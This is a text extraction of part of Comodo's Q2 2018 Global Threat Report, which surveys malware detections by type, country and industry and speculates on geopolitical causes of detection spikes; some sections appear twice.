8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
